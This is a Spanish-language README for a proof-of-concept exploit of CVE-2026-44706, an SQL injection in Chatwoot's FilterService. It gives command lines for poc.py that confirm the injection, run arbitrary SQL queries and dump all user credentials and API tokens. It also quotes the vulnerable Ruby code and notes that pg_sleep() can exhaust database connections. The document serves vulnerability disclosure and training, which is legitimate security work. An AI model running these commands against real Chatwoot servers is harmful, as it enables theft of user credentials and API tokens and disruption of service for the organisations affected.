
Inyección SQL en FilterService de Chatwoot
Un exploit de prueba de concepto para CVE-2026-44706, una vulnerabilidad de inyección SQL en FilterService#lt_gt_filter_values de Chatwoot que permite a cualquier agente autenticado leer toda la base de datos PostgreSQL, incluidas las credenciales de usuario y los tokens de API. Lea el artículo completo aquí.
Uso:
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
En app/services/filter_service.rb (línea 91), la entrada del usuario se interpola directamente en SQL sin parametrización:
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← user input, no sanitization
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← raw interpolation
end
Todos los demás operadores en la clase usan parámetros vinculados (:value_N). Solo is_greater_than e is_less_than son vulnerables.
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 Inyección SQL. Cualquier agente/administrador autenticado puede:
pg_sleep() para agotar las conexiones de la base de datos8.8 Alto CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Esta herramienta es solo para fines educativos y de investigación. Úsela únicamente en sistemas que posea o para los que tenga permiso explícito de prueba. El autor no se hace responsable por cualquier uso indebido o daño causado por este programa.
QuimeraX Intelligence es una plataforma avanzada de EASM e Inteligencia de Amenazas Cibernéticas que se especializa en identificar vulnerabilidades críticas en sistemas complejos. La plataforma monitorea, detecta y alerta proactivamente a los clientes sobre amenazas de seguridad, garantizando transparencia y una respuesta rápida a los riesgos potenciales. Los clientes reciben notificaciones inmediatas e informes completos si sus sistemas se encuentran vulnerables, permitiéndoles tomar medidas de protección. más información
Hakai Security es una empresa de ciberseguridad fundada por profesionales de la seguridad, comprometida con la excelencia técnica. Ofrecemos soluciones de seguridad personalizadas que incluyen pruebas de penetración avanzadas, simulaciones realistas de Red Team y prácticas de desarrollo seguro para proteger proactivamente los activos de nuestros clientes contra las amenazas cibernéticas en evolución.
Hacking Club es la plataforma de formación donde aprendes ciberseguridad a través de lecciones prácticas, laboratorios y desafíos creados por expertos que trabajan en nuestra firma de consultoría de seguridad: directamente desde el campo de batalla a tu entrenamiento. ¡Practica la vulnerabilidad presentada en este repositorio con el hacking club! más información